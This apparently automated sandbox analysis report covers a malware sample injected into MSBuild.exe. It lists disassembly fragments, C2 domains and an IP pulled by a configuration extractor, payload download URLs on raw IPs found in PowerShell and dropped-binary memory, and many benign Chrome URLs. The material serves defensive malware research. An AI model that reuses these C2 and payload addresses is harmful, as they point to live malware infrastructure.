Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [esp+edx+02h] 24_2_00429120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-6Ch] 24_2_004491AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov al, 01h 24_2_00413203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+256995C6h] 24_2_0041B280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov ebx, eax 24_2_004082B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 24_2_00432348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [esi], cl 24_2_00435460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax] 24_2_00445430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [edx], cl 24_2_004224E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then push ebp 24_2_004444B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+04h] 24_2_0041A500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-1ACD9926h] 24_2_0041A500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax+00000584h] 24_2_0041C512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 24_2_00432530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+edi+14h] 24_2_00432530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 24_2_00433600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 24_2_004406C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [edi], cl 24_2_004376EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [ebx], cl 24_2_004376EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp eax 24_2_004496E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 24_2_0041F706
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [esp+ecx+00000084h] 24_2_00430711
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [ecx], dl 24_2_00422739
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h 24_2_00422739
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [edi], cl 24_2_00422739
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h 24_2_00422739
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+08h] 24_2_00432872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [esp+edi+7A78CEDCh] 24_2_0044A896
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [ecx] 24_2_00447940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax] 24_2_00447940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax] 24_2_00447940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edi, byte ptr [esp+eax] 24_2_0044CA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+28A0A914h] 24_2_00448A32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [esi], ax 24_2_00431B48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [esi+01h] 24_2_00401B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax+28h] 24_2_0041FB2D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] 24_2_00409BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] 24_2_00409BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2059B2B8h] 24_2_0040DB98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov eax, dword ptr [esp+38h] 24_2_00444C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov esi, ecx 24_2_0044BCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [ebx+esi*8], A26ABC73h 24_2_0044BCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+0Ch] 24_2_0042EE0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movsx eax, byte ptr [esi+ecx] 24_2_0040AE60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+0Ch] 24_2_0042EE11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [edi], bl 24_2_00410EC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [edi], bl 24_2_00410EC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [edx], al 24_2_0042FEF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h] 24_2_0042EB65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [edx], al 24_2_0042FF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h] 24_2_0042EF34
Source: chrome.exe Memory has grown: Private usage: 1MB later: 39MB

Networking

Source: Malware configuration extractor URLs: scenarisacri.top/gHSAYuqo
Source: Malware configuration extractor URLs: oreheatq.live/gsopp
Source: Malware configuration extractor URLs: castmaxw.run/ganzde
Source: Malware configuration extractor URLs: weldorae.digital/geds
Source: Malware configuration extractor URLs: steelixr.live/aguiz
Source: Malware configuration extractor URLs: advennture.top/GKsiio
Source: Malware configuration extractor URLs: targett.top/dsANGt
Source: Malware configuration extractor URLs: smeltingt.run/giiaus
Source: Malware configuration extractor URLs: ferromny.digital/gwpd
Source: Malware configuration extractor IPs: 176.113.115.6
Source: Joe Sandbox View IP Address: 176.113.115.7 176.113.115.7
Source: Joe Sandbox View IP Address: 1.1.1.1 1.1.1.1
Source: Joe Sandbox View ASN Name: SELECTELRU SELECTELRU
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E5CF1A InternetQueryDataAvailable,InternetReadFile,GetLastError,SetEvent,SetEvent, 0_2_00E5CF1A
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002D.00000002.1772711956.00005B0400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1843799682.00005B0401568000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002D.00000002.1788213185.00005B04011B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1772711956.00005B0400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1793807072.00005B0401428000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002D.00000002.1846887338.00005B0401988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1844256638.00005B0401578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html7 equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002D.00000002.1793807072.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)
Source: powershell.exe, 00000005.00000002.906544930.0000000004E55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.906544930.0000000005097000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.7
Source: rapes.exe, 00000015.00000003.1823364301.000000000165E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.7/files/martin2/random.exe
Source: powershell.exe, 00000008.00000002.938454172.000001551D822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.935739895.0000015519E6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.935607290.0000015519D90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.7/mine/random.exe
Source: mshta.exe, 00000003.00000003.872269379.0000000002BED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.874064568.0000000002BEE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.872069644.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.872236318.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.788
Source: futors.exe, 0000002B.00000003.1859893813.00000000008B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.90.153.244/v7942.exe
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 0000002D.00000002.1772224335.00005B0400978000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=134
Source: chrome.exe, 0000002D.00000002.1772638188.00005B0400A58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)
Source: chrome.exe, 0000002D.00000002.1779428372.00005B040116C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dns-tunnel-check.googlezip.net/connect
Source: svchost.exe, 0000000E.00000003.1203134436.0000024B72000000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: chrome.exe, 0000002D.00000002.1761519610.00005B040008A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://google.com/
Source: powershell.exe, 00000005.00000002.908984573.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.984922811.000001552BBF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.984922811.000001552BD36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.938454172.000001551BDAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: chrome.exe, 0000002D.00000002.1777757098.00005B0400F6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: powershell.exe, 00000005.00000002.906544930.0000000004D01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.938454172.000001551BB81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chrome.exe, 0000002D.00000002.1777298252.00005B0400EC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/
Source: powershell.exe, 00000008.00000002.938454172.000001551BDAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 0000000F.00000002.1369547315.0000021485013000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: chrome.exe, 0000002D.00000002.1777604042.00005B0400F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.gstatic.com/generate_204
Source: powershell.exe, 00000008.00000002.989509140.0000015533DEC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000008.00000002.990863464.0000015534010000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.micrt.com0
Source: chrome.exe, 0000002D.00000002.1777350807.00005B0400EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org?q=
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 0000002D.00000002.1761433177.00005B0400030000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 0000002D.00000002.1846404832.00005B04018E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1764299921.00005B0400864000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 0000002D.00000002.1846404832.00005B04018E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/AccountChooser
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 0000002D.00000002.1761614499.00005B04000A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 0000002D.00000002.1761614499.00005B04000A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxABata
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/samlredirect
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 0000002D.00000002.1764299921.00005B0400864000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com:443
Source: powershell.exe, 00000008.00000002.938454172.000001551BB81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.906544930.0000000004D01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBAr
Source: chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: chrome.exe, 0000002D.00000002.1841972972.00005B0401510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1845660835.00005B0401674000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.24R2mrw_td8.O/m=gapi_iframes
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: json[1].json.27.dr String found in binary or memory: https://assets.msn.com/statics/icons/favicon_newtabpage.png
Source: chrome.exe, 0000002D.00000002.1772750526.00005B0400AA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/
Source: 68qi5p.27.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
Source: 68qi5p.27.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
Source: chrome.exe, 0000002D.00000003.1716324803.00005B04016E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1716539122.00005B0400684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1716667387.00005B0401114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1716476239.00005B0401700000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://calendar.google.com
Source: chrome.exe, 0000002D.00000002.1775881875.00005B0400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1690364771.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776679945.00005B0400DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 0000002D.00000002.1777350807.00005B0400EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: chrome.exe, 0000002D.00000002.1777350807.00005B0400EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chrome.exe, 0000002D.00000002.1777350807.00005B0400EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 0000002D.00000003.1671766690.00005B04015E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 0000002D.00000002.1747122963.000001F7D94A7000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777604042.00005B0400F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1845882949.00005B0401728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777724775.00005B0400F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1790205773.00005B0401260000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776282589.00005B0400CF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 0000002D.00000003.1689534133.00005B0401434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1671766690.00005B04015E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 0000002D.00000003.1651621191.00005B00005E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 0000002D.00000002.1764403818.00005B04008C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromemodelexecution-pa.googleapis.com/v1:Execute?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNh
Source: chrome.exe, 0000002D.00000002.1764403818.00005B04008C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromemodelquality-pa.googleapis.com/v1:LogAiData?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNh
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 0000002D.00000002.1762167783.00005B0400190000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 0000002D.00000002.1772750526.00005B0400AA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/category/extensions
Source: chrome.exe, 0000002D.00000002.1772750526.00005B0400AA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/category/themes
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 0000002D.00000003.1641683702.00006B88000DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 0000002D.00000002.1762131498.00005B0400180000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1772672941.00005B0400A64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1762167783.00005B0400190000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1779428372.00005B040116C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763123022.00005B04004F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1764299921.00005B0400864000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 0000002D.00000002.1767884735.00005B0400928000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 0000002D.00000002.1767884735.00005B0400928000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 0000002D.00000002.1767884735.00005B0400928000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 0000002D.00000002.1772224335.00005B0400978000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=134
Source: 68qi5p.27.dr String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
